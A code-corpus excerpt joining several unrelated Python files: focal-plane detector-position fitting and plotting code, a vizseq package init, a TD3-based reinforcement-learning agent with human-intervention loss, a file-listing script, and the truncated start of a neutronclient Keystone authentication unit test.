self.x0, self.x0_err, self.y0, self.y0_err, self.tau, self.tau_err, self.h, self.sn = data[2:-1]
self.w = 0 * self.x0
self.base = 0 * self.x0
elif len(data[2:-1]) == 4:
self.x0, self.x0_err, self.y0, self.y0_err = data[2:-1]
self.base = 0
else:
raise ValueError("Strange number of columns in %s" % filename)
self.n_obs = data[-1].astype('int')
return self
@classmethod
def from_file(cls, filename):
if filename.endswith('fits') or filename.endswith('fits.gz'):
return cls.from_fits_table(filename)
return cls.from_columns_file(filename)
# This supercedes _SimpleDetData.write
def write(self, filename, format=None):
if format is None:
if filename.endswith('fits') or filename.endswith('fits.gz'):
format = 'fits'
else:
format = 'txt'
data = [('det_uid', self.det_uid)]
for k in self.fields:
v = getattr(self, k)
if v.dtype == bool:
v = v.astype('int8')
data.append((k, v))
odb = moby2.util.StructDB.from_data(data,formats=_fp_formats)
if format == 'fits':
odb.to_fits_table(filename)
elif format == 'txt':
odb.to_column_file(filename)
else:
raise ValueError("Unknown format request, %s." % format)
def write_reduced(self, filename, scale_amp=1.):
format = 'txt'
if filename.endswith('.fits') or filename.endswith('.fits.gz'):
format = 'fits'
s = self.ok.astype(bool)
# det_uid peak_DAC SN tau
data = [('det_uid', self.det_uid[s]),
('peak_dac', self.h[s] * scale_amp),
('time_const', self.tau[s]),
('sn', self.sn[s]),
]
odb = moby2.util.StructDB.from_data(
data, formats={'peak_dac': '%12.3f',
'time_const': '%12.5f',
'sn': '%12.3f'})
if format == 'txt':
odb.to_column_file(filename)
elif format == 'fits':
odb.to_fits_table(filename)
@classmethod
def from_focal_plane(cls, fp):
"""
Initialize from a FocalPlane object.
"""
self = cls(fp.det_uid)
self.x0 = fp.x.copy()
self.y0 = fp.y.copy()
self.ok = fp.mask.copy()
zeros = np.zeros(self.ok.shape)
self.tau, self.h, self.w = zeros.copy(), zeros.copy(), zeros.copy()
self.base = zeros
return self
@classmethod
def combine_fits(cls, fits, template=None, params={}):
"""
Combine fits by shifting each one to match a template, and
averaging the good fits for each detector.
If a template is not provided, match to the first one.
"""
trace(1, 'Fitting and averaging %i fits' % len(fits))
if template is None:
template = fits[0]
# Start by shifting each fit to match the template.
orig_fits, fits = fits, []
fitter = FPTemplateFitter()
fitter.set_template(template)
fit_params = {'shift': True,
'rotation': False}
fit_params.update(params)
fit_results = [None for fi in range(len(orig_fits))]
for fi,f0 in enumerate(orig_fits):
if f0.ok.sum() < params.get('min_dets', 50):
trace(2, 'Discarding fit with only %i good fits' % f0.ok.sum())
continue
ok, result = fitter.fit(f0, fit_params)
if not ok:
trace(2, 'Discarding fit due to failed template match')
continue
f1 = f0.copy()
f1.x0 += result[0]
f1.y0 += result[1]
fits.append(f1)
fit_results[fi] = result
trace(1, 'Cut %i of %i fits (increase verbosity to see why).' % \
(len(orig_fits) - len(fits), len(orig_fits)))
if len(fits) == 0:
return None, None
print([len(f.det_uid) for f in fits])
n_det_uid = max([f.det_uid.max() for f in fits]) + 1
output = cls(np.arange(n_det_uid))
output.ok[:] = False
ARCMIN = np.pi/180/60
trace(1, 'Combining data for %i detectors' % n_det_uid)
for uid in output.det_uid:
ok = np.array([f.get_property('ok', det_uid=uid)[1]
for f in fits])
x, y, tau = np.transpose([f.get_property(['x0','y0','tau'], det_uid=uid)[1]
for f in fits])
for _x in [x, y, tau]:
# Yes, this happens...
ok *= ~np.isnan(_x) * ~np.isinf(_x)
x, y, tau = [_x[ok] for _x in [x,y,tau]]
if ok.sum() < params.get('min_obs', 1):
trace(2, 'Discarding det_uid=%i due to only %i contributors'
% (uid, ok.sum()))
continue
# Majority rules.
x0, y0 = np.median(x), np.median(y)
for iteration in [0,1,2]:
d0 = ((x - x0)**2 + (y-y0)**2)**.5
s0 = d0 < params.get('max_separation', 1)*ARCMIN
if s0.sum() == 0:
break
x0, y0 = x[s0].mean(), y[s0].mean()
if s0.sum() <= 0:
trace(2, 'Discarding det_uid=%i due to only %i items in '\
' combination' % (uid, s0.sum()))
continue
vals = {
'x0': x0, 'y0': y0,
'x0_err': x[s0].std(),
'y0_err': y[s0].std(),
'tau': tau[s0].mean(),
'tau_err': tau[s0].std(),
'n_obs': s0.sum(),
'ok': s0.sum() >= params.get('min_obs', 1) }
output.update_row(uid, vals)
trace(2, 'Result for det_uid=%i' % uid)
for k in ['x0', 'y0', 'tau']:
trace(2, ' %s = %10.5f +- %10.5f' % (k, vals[k], vals[k+'_err']))
return output, fit_results
def plot_positions(self, filename, auto_zoom=True, params={},
title='', fig=None):
import pylab as pl
if fig is None:
pl.figure()
pl.gcf().set_size_inches(6., 6.)
else:
pl.figure(fig.number)
s = self.ok
if s.sum() == 0:
pl.title(title + ' - no good fits')
pl.savefig(filename)
pl.clf()
units = params.get('units', 'deg')
scale = {'rad': 1., 'deg': 180/np.pi, 'arcmin': 60*180/np.pi}[units]
x, y = self.x0[s]*scale, self.y0[s]*scale
x0, y0 = np.median(x), np.median(y)
r = ((x-x0)**2 + (y-y0)**2)**.5
window = np.median(r)*3
inside = r < params.get('zoom', scale*window)
pl.scatter(x, y, alpha=0.5)
if params.get('limits') is None:
if np.any(inside):
for vect,limiter in [(x,pl.xlim), (y,pl.ylim)]:
lo, hi = limiter()
lo = min(lo, vect[inside].min())
hi = max(hi, vect[inside].max())
limiter(lo, hi)
else:
xlims, ylims = params['limits']
pl.xlim(*xlims), pl.ylim(*ylims)
pl.title(title + ' - %i dets outside window' % (~inside).sum())
pl.xlabel('X (%s)' % units)
pl.ylabel('Y (%s)' % units)
def smart_locate(ax, n_max, bases=[1,2,5]):
x0, x1 = ax.get_view_interval()
if x1 == x0:
return
delta = (x1-x0) / (n_max-1)
# Find smallest base and p such delta < base*10^p
log_spacing = min([
np.ceil(np.log10(delta) - np.log10(b)) + np.log10(b)
for b in bases])
loc = pl.MultipleLocator(10**log_spacing)
ax.set_major_locator(loc)
smart_locate(pl.gca().xaxis, 6)
smart_locate(pl.gca().yaxis, 9)
pl.savefig(filename)
pl.clf()
pl.figure()
def plot_rowcol_summaries(self, filename, array_data):
import pylab as pl
def x_eyes(bads=None):
# Mark bad fits with an x.
if bads is None:
bads = ~s
pl.scatter(cols[bads], rows[bads], marker='x', edgecolor='gray')
def limit_args(data, kw={}):
lo, hi = data.min(), data.max()
if s.sum() > 1:
lo, hi = data[s].min(), data[s].max()
if hi == lo:
hi = lo + 1
kw.update({'vmin': lo, 'vmax': hi})
return kw
def bin(data, dtype='float'):
out = np.zeros((n_rows, n_cols), dtype)
out[rows, cols] = data
return out
def imshow_reformat():
# Tighten boundaries, add labels...
pl.xlabel('Column')
pl.ylabel('Row')
pl.xlim(-0.5, n_cols-0.5)
pl.ylim(-0.5, n_rows-0.5)
s = self.ok
rows, cols = array_data.get_property(['row', 'col'], det_uid=self.det_uid)
n_rows, n_cols = rows.max()+1, cols.max()+1
# Init plotting
pl.figure()
pl.gcf().set_size_inches(6., 6.)
pl.subplots_adjust(left=.1, right=.95, top=.95, bottom=.1,
hspace=.2, wspace=.3)
title_fs = 12
# Time constants...
#
pl.subplot(2,2,1)
z = self.tau * 1e3
pl.imshow(bin(z), interpolation='nearest', **limit_args(z))
pl.colorbar()
x_eyes()
pl.title('Time constants (ms)', fontsize=title_fs)
imshow_reformat()
pl.subplot(2,2,2)
z = self.tau_err * 1e3
pl.imshow(bin(z), interpolation='nearest', **limit_args(z))
pl.colorbar()
x_eyes()
pl.title('Time constant errors (ms)', fontsize=title_fs)
imshow_reformat()
if self.ok.sum() > 10:
pl.subplot(2,2,3)
pl.hist(self.tau[self.ok]*1e3, bins=20) #min(20,self.ok.sum()//10)
pl.xlabel('Time constant (ms)')
pl.ylabel('N_dets')
pl.subplot(2,2,4)
pl.hist(self.tau_err[self.ok]*1e3, bins=self.ok.sum()//10)
pl.xlabel('Time constant errors (ms)')
pl.ylabel('N_dets')
pl.savefig(filename+'time_const.png')
pl.clf()
# Positions and stuff
#
for i in [0,1]:
pl.subplot(2,2,1+i)
z = {0: self.x0_err, 1:self.y0_err}[i]
z = z * 180*3600/np.pi # to arcseconds
pl.imshow(bin(z), interpolation='nearest', **limit_args(z))
pl.colorbar()
x_eyes()
imshow_reformat()
pl.title('%s position RMS' % {0: 'X', 1: 'Y'}[i],
fontsize=title_fs)
pl.subplot(2,2,3)
z = self.n_obs
pl.imshow(bin(z), interpolation='nearest')
pl.colorbar()
imshow_reformat()
pl.title('N_obs', fontsize=title_fs)
pl.savefig(filename+'positions.png')
pl.clf()
# Destroy our subplot adjustments
pl.figure()
class FPTemplateFitter:
"""
Class for shift/rotate/shearing a template FPFitFile to match a
target FPFitFile.
After initializing, set the template to use:
fitter = FPTemplateFitter()
fitter.set_template(my_template_fp)
ok, params = fitter.fit(my_target_fp)
Those params are stored internally, so you can get the model FP:
model_for_target = fitter.get_modeled(my_target_fp)
"""
param_names = ['dx', 'dy', 'theta', 'scale', 'shear_theta', 'shear_scale']
formats = {'dx': '%9.6f',
'dy': '%9.6f',
'scale': '%11.4e',
'n_dets': '%4i',
'theta': '%9.6f',
'shear_scale': '%11.4e',
'shear_theta': '%9.6f',
}
@classmethod
def from_params(cls, opts, tod_info=None):
if '_execcfg' in opts:
tod_id = moby2.scripting.products.get_tod_id(tod_info=tod_info)
ic = moby2.scripting.execcfg.InputChooser()
opts1 = ic.get_config(opts['_execcfg'], tod_id=tod_id)
for k,v in list(opts1.items()):
if not k in opts:
opts[k] = v
if 'depot' in opts:
depot = moby2.scripting.get_depot(opts['depot'])
if not 'structure' in opts:
opts['structure'] = '{tag}'
filename = depot.get_full_path(**opts)
else:
filename = opts['filename']
trace(2, 'Loading as template: %s' % filename)
load_args = opts['column_def']
pos_data = moby2.util.StructDB.from_column_file(filename, load_args)
r = opts.get('template_rescale', (1.,1.))
if 'ok' in pos_data.dtype.names:
mask = (pos_data['ok'].astype(int) != 0)
else:
mask = np.ones(pos_data['x'].shape, bool)
template_fits = FPFitFile(det_uid=pos_data['det_uid'][mask])
template_fits.x0[:] = pos_data['x'][mask] * r[0]
template_fits.y0[:] = pos_data['y'][mask] * r[1]
template_fits.ok[:] = True
self = cls()
self.set_template(template_fits)
return self
def set_template(self, template):
self.template = template
self.pivot = self.template.x0[self.template.ok].mean(), \
self.template.y0[self.template.ok].mean()
@staticmethod
def _rotate(theta, x, y):
c, s = np.cos(theta), np.sin(theta)
return x*c - y*s, y*c + x*s
def model(self, params, x=None, y=None):
"""
Shift, rotate, shear the current template according to params
dict. Return the resulting offsets (x, y).
"""
dx, dy, theta, scale, sh_theta, sh_scale = params
scale, sh_scale = np.exp(scale), np.exp(sh_scale)
# Shift away array center and rescale
if x is None:
tp = self.template
x, y = tp.x0, tp.y0
out_x, out_y = scale*(x - self.pivot[0]), scale*(y - self.pivot[1])
# Shear
out_x, out_y = self._rotate(+sh_theta, out_x, out_y)
out_x *= sh_scale
out_x, out_y = self._rotate(-sh_theta, out_x, out_y)
# Rotate
out_x, out_y = self._rotate(theta, out_x, out_y)
# Restore array center and apply additional shift.
return out_x + self.pivot[0] - dx, out_y + self.pivot[1] - dy
def model_inverse(self, params, out_x, out_y):
"""
Inverse of self.model. Keep it up to date!
"""
dx, dy, theta, scale, sh_theta, sh_scale = params
scale, sh_scale = np.exp(scale), np.exp(sh_scale)
# Remove additional shift.
x, y = out_x - self.pivot[0] + dx, out_y - self.pivot[1] + dy
# Unrotate
x, y = self._rotate(-theta, x, y)
# Unshear
x, y = self._rotate(+sh_theta, x, y)
x /= sh_scale
x, y = self._rotate(-sh_theta, x, y)
x, y = x/scale + self.pivot[0], y/scale + self.pivot[1]
return x, y
def fit(self, fp, params, trace_level=0):
"""
Fit positions to a template, which is also an FPFitFile but
may represent different det_uid. 'params' should be a dict
like this one:
params = {
'shift': True,
'rotation': True,
'scale': True,
'shear': True,
}
Returns (ok, params). The fitted_template has the same
det_uid as self.
"""
template = self.template
# Get mask of items that are ok in both the template and fits
fp_ok = fp.ok.astype('bool').copy()
_, temp_ok = template.get_property('ok', fp.det_uid)
fp_ok *= temp_ok
# Get the template and fits positions for those ok items
_, x0 = template.get_property('x0', fp.det_uid[fp_ok])
_, y0 = template.get_property('y0', fp.det_uid[fp_ok])
x1, y1 = fp.x0[fp_ok], fp.y0[fp_ok]
self.A = x0,y0
self.B = x1,y1
# Identify parameters we want to vary
free_params = [params.get('shift', True)]*2
free_params.append(params.get('rotation', True))
free_params.append(params.get('scale', False))
free_params.extend([params.get('shear', False)]*2)
if fp.ok.sum() == 0:
trace(trace_level+0, 'No items for template fit')
self.result = False, [0. for f in free_params]
return self.result
trace(trace_level+0, 'Fitting template using %i items' % fp_ok.sum())
# Start fit with shift based on mean displacement
params0 = [x1.mean()-self.pivot[0], y1.mean()-self.pivot[1],
0., 0., 0., 0.]
trace(trace_level+1, 'Starting parameters: %s' % str(params0))
trace(trace_level+1, 'Free parameters: %s' % str(free_params))
def fit_chi2(params):
x_model, y_model = self.model(params, x0, y0)
var = (x1 - x_model)**2 + (y1 - y_model)**2
#return var.sum()
# Attenuate contribution of outliers? Not clear this works...
mvar = np.median(var)
var_roll = var * (10*mvar / (10*mvar + var))
return var_roll.sum()
# Minimize... start with position or all is lost.
params1 = params0
for iters in [0,1]:
for free_mask in [
# Fit position only...
[True , True , False, False, False, False],
# Fit rotation and scale
[False, False, True , True , False, False],
# Fit skew
[False, False, False, False, True , True ],
# Fit skew and position
[True , True , False, False, True , True ],
# Let everything float
[True , True , True , True , True , True ]]:
free = np.array(free_params) * free_mask
if free.sum() > 0:
params1 = moby2.util.fitting.multi_fmin(
fit_chi2, params1, free=free, disp=0,
xtol=1e-6, ftol=1e-6)
trace(trace_level+2, 'params snapshot: %s' % str(params1))
trace(trace_level+1, 'Final parameters: %s' % str(params1))
self.result = True, params1
return self.result
def check_result(self, opts):
"""
Check self.result against ranges passed in by user. User
passes in a dict with keys like "<name>_range", where <name>
is one of self.param_names. The values are the range (lo, hi) of
acceptable values. If any range checks fail, the function
returns false.
"""
ok, params = self.result
if not ok:
return False
for k, v in zip(self.param_names, params):
k = '%s_range' % k
if not k in opts: continue
if not ((opts[k][0] <= v) and (v < opts[k][1])):
return False
return True
def get_modeled(self, det_uid=None):
"""
Return a FPFitFile with the modeled detector positions. Pass
in the desired det_uid, or the template det_uid will be
used.
"""
if det_uid is None:
det_uid = self.det_uid
matched = FPFitFile(det_uid=det_uid)
_, ok = self.template.get_property('ok', matched.det_uid)
_, x0 = self.template.get_property('x0', matched.det_uid)
_, y0 = self.template.get_property('y0', matched.det_uid)
matched.ok = ok
params = self.result[1]
matched.x0, matched.y0 = self.model(params, x0, y0)
return matched
def make_plots(self, fp, modeled, plot_prefix='./',
title=None):
"""
Show fit quality in a few plots.
"""
import pylab as pl
def sane_axes():
fig.gca().xaxis.set_major_locator(pl.MaxNLocator(4))
fig.gca().yaxis.set_major_locator(pl.MaxNLocator(5))
fig.gca().set_aspect('equal', 'datalim')
DEG = 180./np.pi
fig = pl.figure()
fig.set_size_inches(8., 4.)
pl.subplots_adjust(left=.1, right=.98, top=.85, bottom=.1,
hspace=.2, wspace=.3)
pl.subplot(121)
tp = self.template
s, x, y = tp.ok, tp.x0, tp.y0
pl.scatter(x[s], y[s], marker='o', s=4, alpha=.5)
pl.xlabel('X')
pl.ylabel('Y')
pl.title('Input template')
sane_axes()
# The model positions
pl.subplot(122)
s, x, y = modeled.ok, modeled.x0 * DEG, modeled.y0 * DEG
pl.scatter(x[s], y[s], alpha=.2)
# And the fit positions
s, x, y = fp.ok, fp.x0 * DEG, fp.y0 * DEG
pl.scatter(x[s], y[s], marker='x')
# Now connect them with lines...
u = fp.det_uid[s]
ok1, (x1, y1) = modeled.get_property(['x0','y0'], det_uid=u)
x, y = x[s], y[s]
for i in ok1.nonzero()[0]:
pl.plot([x1[i]*DEG, x[i]], [y1[i]*DEG, y[i]], color='k', alpha=.4)
pl.xlabel('X (deg)')
pl.ylabel('Y (deg)')
pl.title('Fitted result')
sane_axes()
if title != None:
pl.figtext(0.5, 0.93, title, va='bottom', ha='center')
pl.savefig(plot_prefix + 'fit.png')
pl.figure() # destroy our settings...
def old_make_plots(self, fp, modeled, plot_prefix='./',
title=None):
"""
Show fit quality in a few plots.
"""
import pylab as pl
DEG = 180./np.pi
pl.figure()
pl.gcf().set_size_inches(6., 6.)
pl.subplots_adjust(left=.15, right=.95, top=.90, bottom=.1,
hspace=.2, wspace=.3)
tp = self.template
s, x, y = tp.ok, tp.x0, tp.y0
pl.scatter(x[s], y[s], marker='x')
pl.savefig(plot_prefix + '0template.png')
pl.clf()
s, x, y = modeled.ok, modeled.x0 * DEG, modeled.y0 * DEG
pl.scatter(x[s], y[s], alpha=.2)
pl.xlabel('X (deg)')
pl.ylabel('Y (deg)')
pl.savefig(plot_prefix + '1model.png')
pl.clf()
# The model positions
s, x, y = modeled.ok, modeled.x0 * DEG, modeled.y0 * DEG
pl.scatter(x[s], y[s], alpha=.2)
# And the fit positions
s, x, y = fp.ok, fp.x0 * DEG, fp.y0 * DEG
pl.scatter(x[s], y[s], marker='x')
# Now connect them with lines...
u = fp.det_uid[s]
ok1, (x1, y1) = modeled.get_property(['x0','y0'], det_uid=u)
x, y = x[s], y[s]
for i in ok1.nonzero()[0]:
pl.plot([x1[i]*DEG, x[i]], [y1[i]*DEG, y[i]], color='k', alpha=.4)
pl.xlabel('X (deg)')
pl.ylabel('Y (deg)')
if title is not None:
pl.title(title)
pl.savefig(plot_prefix + '2fit.png')
pl.figure() # destroy our settings...
# Formatted output...
def get_ascii(self, names=None, params=None):
if names is None:
names = self.param_names
if params is None:
params = self.result[1]
idx = [self.param_names.index(f) for f in names]
text = [ self.formats.get(n, '%11.4e') % params[i]
for n,i in zip(names,idx) ]
return ' '.join(text)
@staticmethod
def write_fit_list(filename, keys, fits, format=None):
if format == 'fits':
columns = list(zip(*[f.result[1] for f in fits]))
col_defs = ([('id', keys), ('ok', [int(f.result[0]) for f in fits])] +
list(zip(fits[0].param_names, columns)))
db_out = moby2.util.StructDB.from_data(
col_defs, formats=fits[0].formats)
db_out.to_fits_table(filename)
else:
if isinstance(filename, basestring):
filename = open(filename, 'w')
names = fits[0].param_names
filename.write('# %s\n' % ' '.join(names))
for key, fit in zip(keys, fits):
text = fit.get_ascii(names=names)
filename.write('%s %s\n' % (key, text))
| 1.148438 | 1 |
github/joeynmt/vizseq/__init__.py | shania3322/joeynmt | 0 | 35460 | <reponame>shania3322/joeynmt<gh_stars>0
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
import os.path as op
from pathlib import Path
FILE_ROOT = Path(__file__).parent
with open(op.join(FILE_ROOT, 'VERSION')) as f:
__version__ = f.read()
from vizseq.ipynb import *
from vizseq.ipynb import fairseq_viz as fairseq
| 0.925781 | 1 |
TD3_based_DRL/TD3IARL.py | wujingda/Human-in-the-loop-Deep-Reinforcement-Learning-Hug-DRL- | 8 | 35588 | <reponame>wujingda/Human-in-the-loop-Deep-Reinforcement-Learning-Hug-DRL-
'''
This algorithm is a IA-RL implementation on off-policy TD3 algorithm, to check the original IA-RL algorithm
you can refer to https://arxiv.org/abs/1811.06187.
Since it is a baseline algorithm, the descriptions are mostly omitted, please visit the HUGTD3.py for more implementation details
'''
import pickle
import numpy as np
import torch
import torch.nn as nn
from TD3_based_DRL.priority_replay import Memory
from TD3_based_DRL.network_model import Actor,Critic
from TD3_based_DRL.util import hard_update, soft_update
seed = 2
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
MEMORY_CAPACITY = 38400
BATCH_SIZE = 128
GAMMA = 0.95
LR_C = 0.0005
LR_A = 0.0002
LR_I = 0.01
TAU = 0.001
POLICY_NOSIE = 0.2
POLICY_FREQ = 1
NOISE_CLIP = 0.5
class DRL:
def __init__(self, action_dim, state_dim, LR_C = LR_C, LR_A = LR_A):
self.device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
self.state_dim = state_dim[0] * state_dim[1]
self.state_dim_width = state_dim[0]
self.state_dim_height = state_dim[1]
self.action_dim = action_dim
self.batch_size = BATCH_SIZE
self.gamma = GAMMA
self.tau = TAU
self.policy_noise = POLICY_NOSIE
self.noise_clip = NOISE_CLIP
self.policy_freq = POLICY_FREQ
self.itera = 0
self.pointer = 0
self.memory = Memory(MEMORY_CAPACITY)
self.actor = Actor(self.state_dim,self.action_dim).to(self.device)
self.actor_target = Actor(self.state_dim,self.action_dim).to(self.device)
self.actor_optimizer = torch.optim.Adam(self.actor.parameters(),LR_A)
self.critic = Critic(self.state_dim,self.action_dim).to(self.device)
self.critic_target = Critic(self.state_dim,self.action_dim).to(self.device)
self.critic_optimizers = torch.optim.Adam(self.critic.parameters(),LR_C)
hard_update(self.actor_target,self.actor)
hard_update(self.critic_target,self.critic)
def learn(self, batch_size = BATCH_SIZE, epoch=0):
## batched state, batched action, batched action from expert, batched intervention signal, batched reward, batched next state
bs, ba, ba_e, bi, br, bs_, tree_idx, ISweight = self.retrive(batch_size)
bs = torch.tensor(bs, dtype=torch.float).reshape(batch_size, self.state_dim_height, self.state_dim_width).to(self.device)
ba = torch.tensor(ba, dtype=torch.float).to(self.device).to(self.device)
ba_e = torch.tensor(ba_e, dtype=torch.float).to(self.device).to(self.device)
br = torch.tensor(br, dtype=torch.float).to(self.device).to(self.device)
bs_ = torch.tensor(bs_, dtype=torch.float).reshape(batch_size, self.state_dim_height, self.state_dim_width).to(self.device)
# initialize the loss variables
loss_c, loss_a = 0, 0
## calculate the predicted values of the critic
with torch.no_grad():
noise1 = (torch.randn_like(ba) * self.policy_noise).clamp(0, 1)
a_ = (self.actor_target(bs_).detach() + noise1).clamp(0, 1)
target_q1, target_q2 = self.critic_target([bs_,a_])
target_q1 = target_q1.detach()
target_q2 = target_q2.detach()
target_q = torch.min(target_q1,target_q2)
y_expected = br + self.gamma * target_q
y_predicted1, y_predicted2 = self.critic.forward([bs,ba])
errors = y_expected - y_predicted1
## update the critic
critic_loss = nn.MSELoss()
loss_critic = critic_loss(y_predicted1,y_expected)+critic_loss(y_predicted2,y_expected)
self.critic_optimizers.zero_grad()
loss_critic.backward()
self.critic_optimizers.step()
## update the actor
if self.itera % self.policy_freq == 0:
index1,_ = np.where(bi==0)
index2,_ = np.where(bi==1)
bs1,_,_,_=bs[index1],ba[index1],br[index1],bs_[index1]
bs2,ba2,_,_=bs[index2],ba[index2],br[index2],bs_[index2]
if bs2.size(0) != 0:
if bs1.size(0) != 0:
bs1 = torch.reshape(bs1,(len(bs1), self.state_dim_height, self.state_dim_width))
bs2 = torch.reshape(bs2,(len(bs2), self.state_dim_height, self.state_dim_width))
pred_a1 = self.actor.forward(bs1)
pred_a2 = self.actor.forward(bs2)
loss_actor1 = (-self.critic.forward([bs1,pred_a1])[0])
## fixed weight for human guidance actions
loss_actor2 = 3 * ((pred_a2 - ba2)**2)
loss_actor = torch.cat((loss_actor1,loss_actor2),0).mean()
else:
pred_a = self.actor.forward(bs)
loss_actor = 3*((pred_a - ba)**2)
loss_actor = loss_actor.mean()
else:
pred_a = self.actor.forward(bs)
loss_actor = (-self.critic.forward([bs,pred_a])[0]).mean()
self.actor_optimizer.zero_grad()
loss_actor.backward()
self.actor_optimizer.step()
soft_update(self.actor_target,self.actor,self.tau)
soft_update(self.critic_target,self.critic,self.tau)
loss_a = loss_actor.mean().item()
loss_c = loss_critic.mean().item()
self.itera += 1
self.memory.batch_update(tree_idx, abs(errors.detach().cpu().numpy()) )
return loss_c, loss_a
def choose_action(self,state):
state = torch.tensor(state,dtype=torch.float).reshape(self.state_dim_height, self.state_dim_width).to(self.device)
state = state.unsqueeze(0)
action = self.actor.forward(state).detach()
action = action.squeeze(0).cpu().numpy()
action = np.clip(action,-1, 1)
return action
def store_transition(self, s, a, a_e, i, r, s_):
transition = np.hstack((s, a, a_e, i, r, s_))
self.memory.store(transition)
self.pointer += 1
def retrive(self, batch_size):
tree_index, bt, ISWeight = self.memory.sample(batch_size)
bs = bt[:, :self.state_dim]
ba = bt[:, self.state_dim: self.state_dim + self.action_dim]
ba_e = bt[:, self.state_dim + self.action_dim: self.state_dim + self.action_dim + self.action_dim]
bi = bt[:, -self.state_dim - 2: -self.state_dim - 1]
br = bt[:, -self.state_dim - 1: -self.state_dim]
bs_ = bt[:, -self.state_dim:]
return bs, ba, ba_e, bi, br, bs_, tree_index, ISWeight
def memory_save(self):
per = open("memory_IARL.pkl", 'wb')
str = pickle.dumps(self.memory)
per.write(str)
per.close()
def memory_load(self):
with open("memory_IARL.pkl",'rb') as file:
self.memory = pickle.loads(file.read())
def load_model(self, output):
if output is None: return
self.actor.load_state_dict(torch.load('{}/actor.pkl'.format(output)))
self.critic.load_state_dict(torch.load('{}/critic.pkl'.format(output)))
def save_model(self, output):
torch.save(self.actor.state_dict(), '{}/actor.pkl'.format(output))
torch.save(self.critic.state_dict(), '{}/critic.pkl'.format(output))
def save(self, log_dir, epoch):
state = {'actor':self.actor.state_dict(), 'actor_target':self.actor_target.state_dict(),
'actor_optimizer':self.actor_optimizer.state_dict(),
'critic':self.critic.state_dict(), 'critic_target':self.critic_target.state_dict(),
'critic_optimizers':self.critic_optimizers.state_dict(),
'epoch':epoch}
torch.save(state, log_dir)
def load(self, log_dir):
checkpoint = torch.load(log_dir)
self.actor.load_state_dict(checkpoint['actor'])
self.actor_target.load_state_dict(checkpoint['actor_target'])
self.actor_optimizer.load_state_dict(checkpoint['actor_optimizer'])
self.critic.load_state_dict(checkpoint['critic'])
self.critic_target.load_state_dict(checkpoint['critic_target'])
self.critic_optimizers.load_state_dict(checkpoint['critic_optimizers'])
| 2.40625 | 2 |
mtianyan/listname.py | mtianyan/mtianyan | 0 | 35716 | import os.path
filepathlist=[]
filenamelist=[]
def processDirectory ( args, dirname, filenames ):
for filename in filenames:
file_path=os.path.join(dirname,filename)
if os.path.isfile(file_path):
filepathlist.append(file_path)
filenamelist.append(filename)
def getpatch(path):
os.path.walk(r'%s'%path, processDirectory, None )
return filepathlist
getpatch('H:\CodePath\NoteBook\uber_input')
fw = open('data_list.txt','w')
for item in filenamelist:
fw.write(item+'\n')
| 1.867188 | 2 |
neutronclient/tests/unit/test_auth.py | asadoughi/python-neutronclient | 1 | 35844 | <reponame>asadoughi/python-neutronclient
# Copyright 2012 NEC Corporation
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import copy
import httplib2
import json
import uuid
import mox
import testtools
from neutronclient import client
from neutronclient.common import exceptions
from neutronclient.common import utils
USERNAME = 'testuser'
TENANT_NAME = 'testtenant'
TENANT_ID = 'testtenantid'
PASSWORD = 'password'
AUTH_URL = 'authurl'
ENDPOINT_URL = 'localurl'
ENDPOINT_OVERRIDE = 'otherurl'
TOKEN = 'tokentoken'
REGION = 'RegionTest'
KS_TOKEN_RESULT = {
'access': {
'token': {'id': TOKEN,
'expires': '2012-08-11T07:49:01Z',
'tenant': {'id': str(uuid.uuid1())}},
'user': {'id': str(uuid.uuid1())},
'serviceCatalog': [
{'endpoints_links': [],
'endpoints': [{'adminURL': ENDPOINT_URL,
'internalURL': ENDPOINT_URL,
'publicURL': ENDPOINT_URL,
'region': REGION}],
'type': 'network',
'name': 'Neutron Service'}
]
}
}
ENDPOINTS_RESULT = {
'endpoints': [{
'type': 'network',
'name': 'Neutron Service',
'region': REGION,
'adminURL': ENDPOINT_URL,
'internalURL': ENDPOINT_URL,
'publicURL': ENDPOINT_URL
}]
}
class CLITestAuthKeystone(testtools.TestCase):
# Auth Body expected when using tenant name
auth_type = 'tenantName'
def setUp(self):
"""Prepare the test environment."""
super(CLITestAuthKeystone, self).setUp()
self.mox = mox.Mox()
self.client = client.HTTPClient(username=USERNAME,
tenant_name=TENANT_NAME,
password=PASSWORD,
auth_url=AUTH_URL,
region_name=REGION)
self.addCleanup(self.mox.VerifyAll)
self.addCleanup(self.mox.UnsetStubs)
def test_get_token(self):
self.mox.StubOutWithMock(self.client, "request")
res200 = self.mox.CreateMock(httplib2.Response)
res200.status = 200
self.client.request(
AUTH_URL + '/tokens', 'POST',
body=mox.StrContains(self.auth_type), headers=mox.IsA(dict)
).AndReturn((res200, json.dumps(KS_TOKEN_RESULT)))
self.client.request(
mox.StrContains(ENDPOINT_URL + '/resource'), 'GET',
headers=mox.ContainsKeyValue('X-Auth-Token', TOKEN)
).AndReturn((res200, ''))
self.mox.ReplayAll()
self.client.do_request('/resource', 'GET')
self.assertEqual(self.client.endpoint_url, ENDPOINT_URL)
self.assertEqual(self.client.auth_token, TOKEN)
def test_refresh_token(self):
self.mox.StubOutWithMock(self.client, "request")
self.client.auth_token = TOKEN
self.client.endpoint_url = ENDPOINT_URL
res200 = self.mox.CreateMock(httplib2.Response)
res200.status = 200
res401 = self.mox.CreateMock(httplib2.Response)
res401.status = 401
# If a token is expired, neutron server retruns 401
self.client.request(
mox.StrContains(ENDPOINT_URL + '/resource'), 'GET',
headers=mox.ContainsKeyValue('X-Auth-Token', TOKEN)
).AndReturn((res401, ''))
self.client.request(
AUTH_URL + '/tokens', 'POST',
body=mox.IsA(str), headers=mox.IsA(dict)
).AndReturn((res200, json.dumps(KS_TOKEN_RESULT)))
self.client.request(
